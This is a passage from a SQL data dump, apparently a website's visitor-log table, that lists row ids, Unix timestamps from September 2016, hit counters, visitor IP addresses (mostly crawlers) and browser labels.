.92','other'),(63805,1474664814,1,1,0,0,'66.102.9.27','other'),(63806,1474664984,1,1,0,0,'51.255.65.13','other'),(63807,1474665253,1,0,1,0,'66.249.76.45',''),(63808,1474666684,1,1,0,0,'5.9.88.103','other'),(63809,1474666695,1,1,0,0,'163.172.66.177','other'),(63810,1474667452,1,1,0,0,'163.172.65.65','other'),(63811,1474667460,1,1,0,0,'40.77.167.56','other'),(63812,1474667937,1,1,0,0,'163.172.65.188','other'),(63813,1474668047,1,1,0,0,'163.172.66.67','other'),(63814,1474668091,1,1,0,0,'51.255.65.68','other'),(63815,1474668164,1,1,0,0,'163.172.65.252','other'),(63816,1474668370,1,1,0,0,'66.102.9.25','other'),(63817,1474668570,1,1,0,0,'163.172.65.4','other'),(63818,1474668602,1,1,0,0,'207.46.13.94','other'),(63819,1474669352,8,8,0,0,'130.193.50.34','other'),(63820,1474669609,9,9,0,0,'141.8.183.25','other'),(63821,1474669774,11,11,0,0,'141.8.142.58','other'),(63822,1474669788,6,6,0,0,'141.8.142.61','other'),(63823,1474669885,9,9,0,0,'130.193.51.19','other'),(63824,1474669953,2,0,2,0,'68.180.229.34',''),(63825,1474670259,2,2,0,0,'130.193.50.34','other'),(63826,1474670349,1,1,0,0,'51.255.65.66','other'),(63827,1474670434,1,1,0,0,'207.46.13.175','other'),(63828,1474670455,1,1,0,0,'141.8.142.67','other'),(63829,1474670486,1,0,1,0,'66.249.66.87',''),(63830,1474670697,1,1,0,0,'128.68.14.178','chrome'),(63831,1474670715,1,1,0,0,'51.255.65.24','other'),(63832,1474670754,1,1,0,0,'163.172.66.133','other'),(63833,1474671038,1,1,0,0,'164.132.161.26','other'),(63834,1474671243,1,1,0,0,'164.132.161.90','other'),(63835,1474671909,1,1,0,0,'66.102.9.29','other'),(63836,1474672269,1,1,0,0,'109.63.212.31','msie'),(63837,1474673407,1,1,0,0,'163.172.66.140','other'),(63838,1474673724,1,1,0,0,'164.132.161.91','other'),(63839,1474673770,1,1,0,0,'207.46.13.166','other'),(63840,1474673940,1,1,0,0,'164.132.161.74','other'),(63841,1474674635,1,0,1,0,'68.180.229.34',''),(63842,1474674951,1,1,0,0,'51.255.65.50','other'),(63843,1474675172,1,0,1,0,'66.249.76.45',''),(63844,1474675399,1,1,0,0,'51.255.65.54','other'),(63845,1474675509,1,1,0,0,'66.102.9.29','other'),(63846,1474675529,1,1,0,0,'163.172.66.113','other'),(63847,1474675740,1,1,0,0,'164.132.161.80','other'),(63848,1474676083,1,0,1,0,'66.249.76.46',''),(63849,1474676216,1,1,0,0,'164.132.161.91','other'),(63850,1474676260,1,1,0,0,'51.255.65.63','other'),(63851,1474677007,1,1,0,0,'164.132.161.44','other'),(63852,1474677029,1,1,0,0,'51.255.65.21','other'),(63853,1474677362,1,1,0,0,'163.172.64.186','other'),(63854,1474677621,1,1,0,0,'163.172.66.75','other'),(63855,1474677986,1,0,1,0,'66.249.76.45',''),(63856,1474678341,65,65,0,0,'151.80.44.115','other'),(63857,1474678739,1,1,0,0,'163.172.65.190','other'),(63858,1474678898,1,1,0,0,'163.172.65.201','other'),(63859,1474679110,1,1,0,0,'66.102.9.27','other'),(63860,1474679434,1,1,0,0,'163.172.66.156','other'),(63861,1474680001,1,1,0,0,'163.172.66.161','other'),(63862,1474680727,1,1,0,0,'163.172.65.20','other'),(63863,1474680983,1,1,0,0,'163.172.66.119','other'),(63864,1474681873,1,1,0,0,'163.172.65.22','other'),(63865,1474682130,1,1,0,0,'217.69.133.68','other'),(63866,1474682249,1,1,0,0,'163.172.65.17','other'),(63867,1474682378,1,1,0,0,'163.172.65.63','other'),(63868,1474682673,2,1,1,0,'195.154.233.180',''),(63869,1474682712,1,1,0,0,'66.102.9.27','other'),(63870,1474683105,1,1,0,0,'163.172.66.82','other'),(63871,1474683874,1,0,1,0,'66.249.66.183',''),(63872,1474684134,1,1,0,0,'51.255.65.55','other'),(63873,1474684377,1,1,0,0,'109.63.168.41','msie'),(63874,1474684581,1,0,1,0,'66.249.76.47',''),(63875,1474686418,1,1,0,0,'66.102.9.29','other'),(63876,1474686809,1,1,0,0,'51.254.131.245','other'),(63877,1474687048,1,1,0,0,'164.132.161.92','other'),(63878,1474687185,1,1,0,0,'207.46.13.94','other'),(63879,1474687503,1,1,0,0,'164.132.161.4','other'),(63880,1474688817,1,1,0,0,'163.172.66.91','other'),(63881,1474688900,1,0,1,0,'66.249.66.87',''),(63882,1474689566,1,0,1,0,'66.249.76.45',''),(63883,1474690147,1,1,0,0,'164.132.161.72','other'),(63884,1474690225,1,0,1,0,'68.180.229.34',''),(63885,1474690632,1,0,1,0,'66.249.76.45',''),(63886,1474690850,1,0,1,0,'66.249.66.87',''),(63887,1474691474,1,1,0,0,'163.172.66.88','other'),(63888,1474691652,1,0,1,0,'66.249.76.45',''),(63889,1474691685,1,1,0,0,'163.172.66.11','other'),(63890,1474692874,1,1,0,0,'164.132.161.72','other'),(63891,1474692942,2,2,0,0,'5.9.88.103','other'),(63892,1474694113,1,1,0,0,'163.172.64.232','other'),(63893,1474694184,1,1,0,0,'93.158.152.84','other'),(63894,1474694191,1,1,0,0,'163.172.65.20','other'),(63895,1474694288,1,1,0,0,'163.172.65.197','other'),(63896,1474695556,1,1,0,0,'164.132.161.30','other'),(63897,1474695719,1,1,0,0,'163.172.66.57','other'),(63898,1474696091,1,1,0,0,'91.196.178.135','firefox'),(63899,1474697207,1,1,0,0,'207.46.13.94','other'),(63900,1474697510,1,1,0,0,'163.172.64.254','other'),(63901,1474697511,1,1,0,0,'157.55.39.180','other'),(63902,1474698383,1,1,0,0,'163.172.65.55','other'),(63903,1474698464,1,1,0,0,'163.172.66.95','other'),(63904,1474698619,1,1,0,0,'163.172.66.41','other'),(63905,1474698734,1,1,0,0,'163.172.65.184','other'),(63906,1474698745,1,1,0,0,'163.172.66.174','other'),(63907,1474699058,1,0,1,0,'66.249.76.45',''),(63908,1474699091,1,1,0,0,'163.172.66.63','other'),(63909,1474699170,64,64,0,0,'69.30.198.178','other'),(63910,1474700122,1,1,0,0,'163.172.66.119','other'),(63911,1474700848,1,1,0,0,'51.255.65.71','other'),(63912,1474701693,1,1,0,0,'51.255.65.59','other'),(63913,1474703693,1,1,0,0,'207.46.13.175','other'),(63914,1474704070,1,1,0,0,'51.255.65.3','other'),(63915,1474704346,1,0,1,0,'66.249.76.45',''),(63916,1474704442,1,1,0,0,'164.132.161.9','other'),(63917,1474704680,1,1,0,0,'51.255.65.96','other'),(63918,1474704980,1,1,0,0,'163.172.66.59','other'),(63919,1474705217,1,1,0,0,'40.77.167.56','other'),(63920,1474705382,1,1,0,0,'164.132.161.48','other'),(63921,1474705623,1,1,0,0,'163.172.66.29','other'),(63922,1474706350,1,1,0,0,'51.255.65.29','other'),(63923,1474706523,1,1,0,0,'164.132.161.75','other'),(63924,1474706953,1,1,0,0,'163.172.64.233','other'),(63925,1474707161,1,1,0,0,'51.255.65.97','other'),(63926,1474708447,1,1,0,0,'164.132.161.64','other'),(63927,1474709141,1,1,0,0,'51.255.65.47','other'),(63928,1474709405,1,1,0,0,'163.172.66.124','other'),(63929,1474709871,1,1,0,0,'163.172.64.246','other'),(63930,1474709923,1,1,0,0,'51.255.65.10','other'),(63931,1474710009,1,1,0,0,'164.132.161.14','other'),(63932,1474710392,1,1,0,0,'40.77.167.56','other'),(63933,1474710635,2,0,2,0,'66.249.76.45',''),(63934,1474710770,1,1,0,0,'94.179.71.131','chrome'),(63935,1474711408,1,1,0,0,'95.24.58.56','msie'),(63936,1474712005,1,0,1,0,'66.249.66.87',''),(63937,1474712100,1,1,0,0,'163.172.66.28','other'),(63938,1474712173,1,1,0,0,'51.255.65.71','other'),(63939,1474712375,1,1,0,0,'164.132.161.28','other'),(63940,1474712595,1,1,0,0,'128.69.235.14','chrome'),(63941,1474713048,1,1,0,0,'51.255.65.90','other'),(63942,1474713634,1,1,0,0,'51.255.65.25','other'),(63943,1474713752,1,0,1,0,'66.249.76.46',''),(63944,1474714339,1,1,0,0,'207.46.13.175','other'),(63945,1474714823,1,1,0,0,'163.172.65.7','other'),(63946,1474715842,1,1,0,0,'51.255.65.2','other'),(63947,1474716198,1,1,0,0,'180.76.15.9','other'),(63948,1474716921,1,1,0,0,'163.172.66.63','other'),(63949,1474716974,1,1,0,0,'130.193.50.34','other'),(63950,1474717104,1,1,0,0,'163.172.64.242','other'),(63951,1474717108,1,1,0,0,'164.132.161.90','other'),(63952,1474717215,1,1,0,0,'66.249.76.46','chrome'),(63953,1474718226,1,1,0,0,'163.172.65.222','other'),(63954,1474718838,1,0,1,0,'68.180.229.190',''),(63955,1474718942,2,2,0,0,'157.55.39.180','other'),(63956,1474718975,1,1,0,0,'163.172.64.192','other'),(63957,1474719005,1,0,1,0,'66.249.66.81',''),(63958,1474719717,1,1,0,0,'66.249.93.14','chrome'),(63959,1474720635,1,0,1,0,'66.249.76.45',''),(63960,1474721323,1,1,0,0,'163.172.65.66','other'),(63961,1474721964,1,0,1,0,'66.249.76.46',''),(63962,1474722978,1,1,0,0,'51.255.65.42','other'),(63963,1474723486,1,1,0,0,'164.132.161.74','other'),(63964,1474724092,1,1,0,0,'207.46.13.175','other'),(63965,1474725299,1,1,0,0,'163.172.65.248','other'),(63966,1474726402,1,1,0,0,'163.172.66.16','other'),(63967,1474726430,1,1,0,0,'163.172.65.246','other'),(63968,1474727470,1,1,0,0,'51.255.65.74','other'),(63969,1474727937,1,1,0,0,'40.77.167.56','other'),(63970,1474728031,1,1,0,0,'164.132.161.7','other'),(63971,1474728356,1,1,0,0,'51.255.194.3','other'),(63972,1474729196,1,0,1,0,'66.249.76.46',''),(63973,1474729709,1,1,0,0,'163.172.65.21','other'),(63974,1474729975,1,0,1,0,'66.249.76.47',''),(63975,1474730050,1,1,0,0,'51.255.65.43','other'),(63976,1474730183,1,1,0,0,'163.172.64.249','other'),(63977,1474731597,1,1,0,0,'163.172.65.36','other'),(63978,1474732318,1,1,0,0,'163.172.65.130','other'),(63979,1474732579,1,1,0,0,'164.132.161.97','other'),(63980,1474733061,1,1,0,0,'66.249.76.47','chrome'),(63981,1474733105,1,0,1,0,'66.249.66.177',''),(63982,1474733266,1,0,1,0,'66.249.66.81',''),(63983,1474733298,1,1,0,0,'66.249.76.81','chrome'),(63984,1474733433,1,1,0,0,'51.255.65.75','other'),(63985,1474733898,1,1,0,0,'164.132.161.62','other'),(63986,1474736101,1,1,0,0,'51.255.65.38','other'),(63987,1474738517,1,0,1,0,'66.249.76.46',''),(63988,1474739975,1,1,0,0,'207.46.13.94','other'),(63989,1474740037,1,0,1,0,'66.249.76.45',''),(63990,1474740059,1,1,0,0,'91.196.178.33','chrome'),(63991,1474741693,1,1,0,0,'164.132.161.22','other'),(63992,1474742029,1,0,1,0,'66.249.76.46',''),(63993,1474742573,1,0,1,0,'66.249.66.177',''),(63994,1474742844,1,0,1,0,'66.249.76.47',''),(63995,1474743436,1,1,0,0,'163.172.65.26','other'),(63996,1474743928,1,1,0,0,'66.249.76.45','chrome'),(63997,1474744759,1,0,1,0,'66.249.66.84',''),(63998,1474744900,1,1,0,0,'51.255.65.10','other'),(63999,1474744924,1,1,0,0,'40.77.167.56','other'),(64000,1474745691,1,1,0,0,'163.172.65.51','other'),(64001,1474745912,1,1,0,0,'40.77.167.56','other'),(64002,1474746378,1,1,0,0,'51.255.65.33','other'),(64003,1474746650,1,1,0,0,'51.255.65.16','other'),(64004,1474747120,1,1,0,0,'164.132.161.91','other'),(64005,1474747429,1,1,0,0,'164.132.161.32','other'),(64006,1474747481,1,1,0,0,'163.172.66.174','other'),(64007,1474747527,1,1,0,0,'66.102.9.29','other'),(64008,1474747778,1,1,0,0,'163.172.65.217','other'),(64009,1474747949,1,1,0,0,'51.255.65.32','other'),(64010,1474748064,1,1,0,0,'164.132.161.56','other'),(64011,1474750123,1,1,0,0,'66.249.66.84','chrome'),(64012,1474750276,1,1,0,0,'40.77.167.56','other'),(64013,1474751303,1,1,0,0,'163.172.64.242','other'),(64014,1474751564,1,1,0,0,'130.193.50.34','other'),(64015,1474751718,1,1,0,0,'66.102.9.29','other'),(64016,1474752394,1,1,0,0,'51.255.65.63','other'),(64017,1474752503,1,1,0,0,'164.132.161.58','other'),(64018,1474752558,1,1,0,0,'164.132.161.59','other'),(64019,1474752646,1,1,0,0,'163.172.66.151','other'),(64020,1474752784,1,0,1,0,'66.249.76.47',''),(64021,1474753108,1,1,0,0,'163.172.65.242','other'),(64022,1474753200,1,1,0,0,'51.255.65.57','other'),(64023,1474753438,1,1,0,0,'164.132.161.44','other'),(64024,1474754501,1,0,1,0,'66.249.66.84',''),(64025,1474754650,1,0,1,0,'66.249.66.87',''),(64026,1474755188,1,1,0,0,'66.102.9.27','other'),(64027,1474755582,1,1,0,0,'207.46.13.97','other'),(64028,1474756310,1,1,0,0,'164.132.161.49','other'),(64029,1474756516,1,1,0,0,'163.172.66.154','other'),(64030,1474757251,1,1,0,0,'163.172.65.249','other'),(64031,1474757630,1,1,0,0,'51.255.65.37','other'),(64032,1474758309,1,0,1,0,'68.180.229.34',''),(64033,1474758368,1,1,0,0,'163.172.65.52','other'),(64034,1474758668,1,1,0,0,'66.102.9.27','other'),(64035,1474758769,1,1,0,0,'40.77.167.56','other'),(64036,1474759252,1,0,1,0,'66.249.76.81',''),(64037,1474759469,1,0,1,0,'66.249.76.47',''),(64038,1474759609,2,0,2,0,'66.249.76.45',''),(64039,1474759942,1,1,0,0,'51.255.65.34','other'),(64040,1474759984,1,1,0,0,'163.172.65.53','other'),(64041,1474760076,1,1,0,0,'164.132.161.47','other'),(64042,1474761022,1,1,0,0,'164.132.161.35','other'),(64043,1474762153,1,1,0,0,'66.102.9.27','other'),(64044,1474762220,156,156,0,0,'62.210.143.245','other'),(64045,1474762382,1,1,0,0,'157.55.39.180','other'),(64046,1474762682,1,0,1,0,'66.249.76.47',''),(64047,1474763047,1,1,0,0,'51.255.65.28','other'),(64048,1474763514,1,1,0,0,'51.255.65.26','other'),(64049,1474764066,1,1,0,0,'40.77.167.79','other'),(64050,1474764250,1,1,0,0,'51.255.65.86','other'),(64051,1474765210,1,1,0,0,'163.172.65.64','other'),(64052,1474765758,7,7,0,0,'37.9.41.221','chrome'),(64053,1474765782,1,1,0,0,'66.102.9.29','other'),(64054,1474765830,1,1,0,0,'163.172.66.80','other'),(64055,1474766010,1,1,0,0,'163.172.66.68','other'),(64056,1474766109,2,2,0,0,'46.4.32.75','other'),(64057,1474766581,1,1,0,0,'51.255.65.80','other'),(64058,1474766772,1,0,1,0,'68.180.229.34',''),(64059,1474767481,1,1,0,0,'164.132.161.71','other'),(64060,1474767576,1,1,0,0,'51.255.65.26','other'),(64061,1474767994,1,1,0,0,'163.172.66.133','other'),(64062,1474768103,1,1,0,0,'40.77.167.79','other'),(64063,1474768159,1,0,1,0,'66.249.76.81',''),(64064,1474769188,1,1,0,0,'66.102.9.27','other'),(64065,1474770395,1,1,0,0,'207.46.13.63','other'),(64066,1474770416,1,0,1,0,'66.249.76.46',''),(64067,1474770429,1,0,1,0,'66.249.76.47',''),(64068,1474770465,1,1,0,0,'51.255.65.74','other'),(64069,1474770708,1,1,0,0,'163.172.65.64','other'),(64070,1474772058,1,1,0,0,'163.172.65.4','other'),(64071,1474773331,1,1,0,0,'66.102.9.27','other'),(64072,1474773765,1,1,0,0,'163.172.65.248','other'),(64073,1474774176,1,0,1,0,'66.249.66.84',''),(64074,1474774234,1,0,1,0,'66.249.66.87',''),(64075,1474774940,1,0,1,0,'66.249.76.45',''),(64076,1474775597,1,1,0,0,'40.77.167.79','other'),(64077,1474776413,1,1,0,0,'51.255.65.49','other'),(64078,1474776741,1,1,0,0,'51.255.65.60','other'),(64079,1474776742,1,1,0,0,'163.172.65.29','other'),(64080,1474776892,1,1,0,0,'66.102.9.25','other'),(64081,1474778591,1,1,0,0,'51.255.65.71','other'),(64082,1474778828,1,1,0,0,'164.132.161.63','other'),(64083,1474779966,1,1,0,0,'66.102.9.29','other'),(64084,1474780085,2,0,2,0,'66.249.76.47',''),(64085,1474780238,1,0,1,0,'66.249.66.183',''),(64086,1474780903,1,1,0,0,'157.55.39.80','other'),(64087,1474781060,1,1,0,0,'164.132.161.96','other'),(64088,1474781551,1,0,1,0,'66.249.76.46',''),(64089,1474782564,1,1,0,0,'164.132.161.64','other'),(64090,1474783495,1,1,0,0,'51.255.65.65','other'),(64091,1474783622,1,1,0,0,'164.132.161.49','other'),(64092,1474784017,1,1,0,0,'66.102.9.25','other'),(64093,1474784110,1,1,0,0,'163.172.65.49','other'),(64094,1474785342,1,1,0,0,'163.172.66.52','other'),(64095,1474785411,1,1,0,0,'163.172.64.182','other'),(64096,1474785472,1,1,0,0,'51.255.65.21','other'),(64097,1474785664,1,1,0,0,'164.132.161.47','other'),(64098,1474785671,1,1,0,0,'51.255.65.52','other'),(64099,1474785748,1,0,1,0,'66.249.76.47',''),(64100,1474786064,1,1,0,0,'94.179.59.92','firefox'),(64101,1474786066,1,1,0,0,'66.249.76.45','chrome'),(64102,1474786380,1,1,0,0,'163.172.64.225','other'),(64103,1474787130,1,1,0,0,'51.255.65.73','other'),(64104,1474787214,1,1,0,0,'66.102.9.25','other'),(64105,1474787362,1,1,0,0,'163.172.64.183','other'),(64106,1474788549,1,1,0,0,'163.172.66.141','other'),(64107,1474789228,1,1,0,0,'91.124.182.3','firefox'),(64108,1474789298,1,1,0,0,'51.255.65.15','other'),(64109,1474789927,1,0,1,0,'66.249.76.45',''),(64110,1474790001,1,0,1,0,'66.249.66.84',''),(64111,1474790128,1,1,0,0,'180.76.15.150','other'),(64112,1474790566,1,1,0,0,'51.255.65.24','other'),(64113,1474790648,1,1,0,0,'163.172.65.31','other'),(64114,1474791640,1,0,1,0,'66.249.76.47',''),(64115,1474791642,1,1,0,0,'66.249.76.45','chrome'),(64116,1474792504,5,5,0,0,'92.222.94.100','other'),(64117,1474793428,1,1,0,0,'188.244.45.43','msie'),(64118,1474793467,1,1,0,0,'51.255.65.15','other'),(64119,1474793524,1,1,0,0,'164.132.161.63','other'),(64120,1474794304,1,1,0,0,'51.255.65.84','other'),(64121,1474794633,1,1,0,0,'164.132.161.59','other'),(64122,1474795141,2,2,0,0,'69.30.198.186','other'),(64123,1474795292,1,1,0,0,'157.55.39.227','other'),(64124,1474795512,1,1,0,0,'51.255.65.2','other'),(64125,1474797434,1,1,0,0,'51.255.65.60','other'),(64126,1474797906,1,1,0,0,'51.255.65.9','other'),(64127,1474798205,1,1,0,0,'157.55.39.227','other'),(64128,1474798849,1,1,0,0,'163.172.65.45','other'),(64129,1474799000,1,1,0,0,'163.172.65.63','other'),(64130,1474799222,1,1,0,0,'174.129.237.157','other'),(64131,1474799750,1,1,0,0,'163.172.65.47','other'),(64132,1474800137,1,1,0,0,'180.76.15.20','other'),(64133,1474800877,1,0,1,0,'66.249.76.45',''),(64134,1474801800,1,1,0,0,'51.255.65.29','other'),(64135,1474801931,1,1,0,0,'163.172.66.156','other'),(64136,1474802602,2,2,0,0,'207.46.13.63','other'),(64137,1474802778,1,1,0,0,'51.255.65.26','other'),(64138,1474803948,1,1,0,0,'51.255.65.7','other'),(64139,1474805526,1,0,1,0,'66.249.66.81',''),(64140,1474805890,1,0,1,0,'66.249.76.46',''),(64141,1474806549,1,1,0,0,'51.255.65.17','other'),(64142,1474806829,1,1,0,0,'51.255.65.27','other'),(64143,1474807254,1,1,0,0,'163.172.65.180','other'),(64144,1474807523,1,1,0,0,'51.255.65.28','other'),(64145,1474810465,1,0,1,0,'66.249.66.81',''),(64146,1474812462,1,1,0,0,'163.172.65.68','other'),(64147,1474812478,1,1,0,0,'164.132.161.11','other'),(64148,1474812793,1,1,0,0,'163.172.65.66','other'),(64149,1474812942,1,1,0,0,'51.255.65.66','other'),(64150,1474813501,1,1,0,0,'51.255.65.72','other'),(64151,1474813538,1,1,0,0,'163.172.66.12','other'),(64152,1474813595,1,0,1,0,'68.180.229.34',''),(64153,1474814069,1,1,0,0,'163.172.65.239','other'),(64154,1474814420,1,0,1,0,'66.249.66.81',''),(64155,1474814488,1,1,0,0,'163.172.66.165','other'),(64156,1474814653,1,0,1,0,'68.180.229.190',''),(64157,1474814879,1,1,0,0,'157.55.39.246','other'),(64158,1474815497,1,1,0,0,'51.255.65.20','other'),(64159,1474815967,1,1,0,0,'164.132.161.64','other'),(64160,1474816000,1,1,0,0,'164.132.161.88','other'),(64161,1474816001,1,0,1,0,'66.249.76.46',''),(64162,1474816562,1,0,1,0,'66.249.66.81',''),(64163,1474816968,1,0,1,0,'68.180.229.34',''),(64164,1474817228,1,1,0,0,'163.172.66.172','other'),(64165,1474817236,1,1,0,0,'164.132.161.77','other'),(64166,1474817690,1,1,0,0,'176.15.182.200','chrome'),(64167,1474817877,1,1,0,0,'51.255.65.2','other'),(64168,1474818009,1,1,0,0,'164.132.161.45','other'),(64169,1474818038,1,1,0,0,'163.172.66.32','other'),(64170,1474818039,1,1,0,0,'83.233.207.74','other'),(64171,1474819019,1,1,0,0,'164.132.161.97','other'),(64172,1474819190,1,1,0,0,'164.132.161.90','other'),(64173,1474819192,1,1,0,0,'164.132.161.94','other'),(64174,1474819554,1,1,0,0,'164.132.161.54','other'),(64175,1474819586,1,1,0,0,'163.172.64.242','other'),(64176,1474819709,1,1,0,0,'163.172.65.194','other'),(64177,1474819891,1,1,0,0,'163.172.65.184','other'),(64178,1474820204,1,1,0,0,'207.46.13.63','other'),(64179,1474820385,1,1,0,0,'163.172.66.94','other'),(64180,1474820641,1,1,0,0,'40.77.167.79','other'),(64181,1474821337,1,1,0,0,'164.132.161.27','other'),(64182,1474822008,1,0,1,0,'68.180.229.34',''),(64183,1474822392,1,1,0,0,'164.132.161.78','other'),(64184,1474823107,1,1,0,0,'51.255.65.52','other'),(64185,1474823472,1,1,0,0,'51.255.65.37','other'),(64186,1474825119,1,0,1,0,'66.249.76.77',''),(64187,1474825647,1,1,0,0,'91.124.182.3','firefox'),(64188,1474826502,1,1,0,0,'51.255.65.62','other'),(64189,1474826583,1,1,0,0,'164.132.161.26','other'),(64190,1474827525,1,1,0,0,'163.172.65.12','other'),(64191,1474827669,1,1,0,0,'164.132.161.37','other'),(64192,1474827682,1,0,1,0,'66.249.76.47',''),(64193,1474827884,1,1,0,0,'66.249.66.84','chrome'),(64194,1474828255,1,1,0,0,'66.249.66.180','chrome'),(64195,1474828395,1,1,0,0,'178.54.82.169','chrome'),(64196,1474828817,1,1,0,0,'51.255.65.64','other'),(64197,1474829798,1,1,0,0,'91.196.178.65','chrome'),(64198,1474829802,1,1,0,0,'163.172.66.128','other'),(64199,1474830705,1,1,0,0,'207.46.13.63','other'),(64200,1474830748,1,1,0,0,'163.172.66.58','other'),(64201,1474830782,1,1,0,0,'164.132.161.28','other'),(64202,1474831084,1,1,0,0,'185.26.180.29','other'),(64203,1474831214,1,1,0,0,'91.124.182.3','firefox'),(64204,1474831367,1,1,0,0,'66.249.76.45','chrome'),(64205,1474832462,1,1,0,0,'51.255.65.3','other'),(64206,1474832603,1,1,0,0,'163.172.65.25','other'),(64207,1474832616,1,1,0,0,'163.172.65.183','other'),(64208,1474832893,1,1,0,0,'51.255.65.26','other'),(64209,1474832955,1,1,0,0,'163.172.66.160','other'),(64210,1474833907,1,1,0,0,'164.132.161.76','other'),(64211,1474834652,1,1,0,0,'163.172.64.186','other'),(64212,1474835160,1,1,0,0,'51.255.65.26','other'),(64213,1474836163,1,1,0,0,'164.132.161.42','other'),(64214,1474836235,1,1,0,0,'163.172.65.185','other'),(64215,1474836397,1,1,0,0,'164.132.161.51','other'),(64216,1474836526,1,1,0,0,'51.255.65.37','other'),(64217,1474837064,1,1,0,0,'164.132.161.49','other'),(64218,1474837086,1,1,0,0,'164.132.161.40','other'),(64219,1474837309,1,1,0,0,'164.132.161.96','other'),(64220,1474837533,1,1,0,0,'164.132.161.69','other'),(64221,1474837823,1,1,0,0,'164.132.161.35','other'),(64222,1474837834,1,0,1,0,'66.249.76.46',''),(64223,1474841114,1,1,0,0,'157.55.39.210','other'),(64224,1474841135,1,1,0,0,'164.132.161.70','other'),(64225,1474841567,1,1,0,0,'51.255.65.92','other'),(64226,1474842547,1,1,0,0,'164.132.161.26','other'),(64227,1474842623,1,1,0,0,'163.172.65.63','other'),(64228,1474844133,1,1,0,0,'40.77.167.79','other'),(64229,1474845019,1,1,0,0,'174.129.237.157','other'),(64230,1474846086,1,1,0,0,'163.172.65.248','other'),(64231,1474846166,1,0,1,0,'66.249.66.81',''),(64232,1474846970,1,1,0,0,'51.255.65.41','other'),(64233,1474848298,1,1,0,0,'163.172.65.61','other'),(64234,1474849120,1,1,0,0,'163.172.66.51','other'),(64235,1474850397,1,1,0,0,'51.255.65.20','other'),(64236,1474851730,1,1,0,0,'207.46.13.165','other'),(64237,1474851894,1,1,0,0,'51.255.65.34','other'),(64238,1474852033,1,1,0,0,'51.255.65.79','other'),(64239,1474853042,1,1,0,0,'51.255.65.29','other'),(64240,1474853387,1,1,0,0,'207.46.13.63','other'),(64241,1474853592,1,1,0,0,'163.172.66.155','other'),(64242,1474854541,1,1,0,0,'163.172.65.32','other'),(64243,1474855063,1,1,0,0,'180.76.15.22','other'),(64244,1474855175,1,1,0,0,'163.172.65.215','other'),(64245,1474855395,1,1,0,0,'163.172.65.34','other'),(64246,1474855624,1,1,0,0,'163.172.64.231','other'),(64247,1474856521,1,1,0,0,'51.255.65.80','other'),(64248,1474857493,1,1,0,0,'157.55.39.227','other'),(64249,1474858308,1,1,0,0,'40.77.167.79','other'),(64250,1474859091,1,1,0,0,'164.132.161.53','other'),(64251,1474859720,1,1,0,0,'163.172.66.101','other'),(64252,1474859851,1,1,0,0,'163.172.66.32','other'),(64253,1474860123,2,2,0,0,'164.132.161.14','other'),(64254,1474860144,1,1,0,0,'164.132.161.90','other'),(64255,1474860291,1,1,0,0,'163.172.65.126','other'),(64256,1474862211,1,1,0,0,'163.172.66.34','other'),(64257,1474862693,1,0,1,0,'66.249.66.81',''),(64258,1474863052,1,1,0,0,'163.172.64.222','other'),(64259,1474863317,1,1,0,0,'207.46.13.63','other'),(64260,1474864745,1,1,0,0,'163.172.66.6','other'),(64261,1474864761,1,0,1,0,'68.180.229.34',''),(64262,1474864771,1,1,0,0,'163.172.65.206','other'),(64263,1474864809,1,1,0,0,'164.132.161.77','other'),(64264,1474864836,1,1,0,0,'51.255.65.44','other'),(64265,1474864932,1,1,0,0,'164.132.161.27','other'),(64266,1474865071,1,1,0,0,'207.46.13.165','other'),(64267,1474865211,9,0,9,0,'68.180.229.190',''),(64268,1474865448,1,1,0,0,'164.132.161.62','other'),(64269,1474865469,1,1,0,0,'164.132.161.9','other'),(64270,1474865485,1,1,0,0,'197.48.181.239','firefox'),(64271,1474865609,1,1,0,0,'164.132.161.26','other'),(64272,1474865652,1,1,0,0,'164.132.161.96','other'),(64273,1474865662,1,1,0,0,'51.255.65.85','other'),(64274,1474866020,1,1,0,0,'163.172.65.69','other'),(64275,1474866390,2,0,2,0,'68.180.229.190',''),(64276,1474867090,1,0,1,0,'66.249.76.45',''),(64277,1474867125,1,1,0,0,'207.46.13.63','other'),(64278,1474867317,1,1,0,0,'164.132.161.48','other'),(64279,1474867517,1,0,1,0,'66.249.76.79',''),(64280,1474868089,1,1,0,0,'51.255.65.79','other'),(64281,1474868427,1,1,0,0,'163.172.65.52','other'),(64282,1474868535,1,1,0,0,'163.172.66.31','other'),(64283,1474868559,1,1,0,0,'164.132.161.43','other'),(64284,1474868628,1,1,0,0,'51.255.65.44','other'),(64285,1474868757,1,1,0,0,'163.172.66.61','other'),(64286,1474868873,1,1,0,0,'178.94.25.199','firefox'),(64287,1474869177,1,1,0,0,'163.172.65.30','other'),(64288,1474869495,1,1,0,0,'164.132.161.49','other'),(64289,1474869545,2,2,0,0,'40.77.167.79','other'),(64290,1474869864,1,1,0,0,'163.172.65.2','other'),(64291,1474869981,1,0,1,0,'68.180.229.190',''),(64292,1474870559,1,1,0,0,'66.249.93.13','chrome'),(64293,1474871049,1,1,0,0,'163.172.65.182','other'),(64294,1474871545,1,1,0,0,'164.132.161.2','other'),(64295,1474871559,1,1,0,0,'91.196.178.71','firefox'),(64296,1474872428,1,1,0,0,'51.255.65.70','other'),(64297,1474872772,1,1,0,0,'51.255.65.21','other'),(64298,1474872945,1,1,0,0,'51.255.65.87','other'),(64299,1474873849,1,1,0,0,'66.249.76.46','chrome'),(64300,1474874033,1,1,0,0,'94.179.123.45','firefox'),(64301,1474874997,1,1,0,0,'91.196.178.68','chrome'),(64302,1474875976,1,1,0,0,'180.76.15.15','other'),(64303,1474876440,2,2,0,0,'195.154.255.20','other'),(64304,1474877003,222,222,0,0,'95.91.45.174','other'),(64305,1474877066,1,1,0,0,'91.196.178.68','firefox'),(64306,1474877105,1,1,0,0,'66.102.9.25','other'),(64307,1474877314,1,1,0,0,'163.172.66.59','other'),(64308,1474877896,1,1,0,0,'163.172.66.5','other'),(64309,1474878312,1,1,0,0,'163.172.65.195','other'),(64310,1474878513,1,1,0,0,'163.172.64.228','other'),(64311,1474878796,1,1,0,0,'163.172.65.235','other'),(64312,1474879106,1,1,0,0,'164.132.161.6','other'),(64313,1474879114,1,1,0,0,'5.255.250.41','other'),(64314,1474879224,1,1,0,0,'164.132.161.95','other'),(64315,1474879240,1,1,0,0,'51.255.65.26','other'),(64316,1474879827,1,1,0,0,'163.172.64.228','other'),(64317,1474880510,1,1,0,0,'51.255.65.69','other'),(64318,1474880799,1,0,1,0,'66.249.76.47',''),(64319,1474881180,1,1,0,0,'66.102.9.25','other'),(64320,1474881717,3,3,0,0,'130.193.50.34','other'),(64321,1474882325,4,4,0,0,'141.8.183.25','other'),(64322,1474882440,1,1,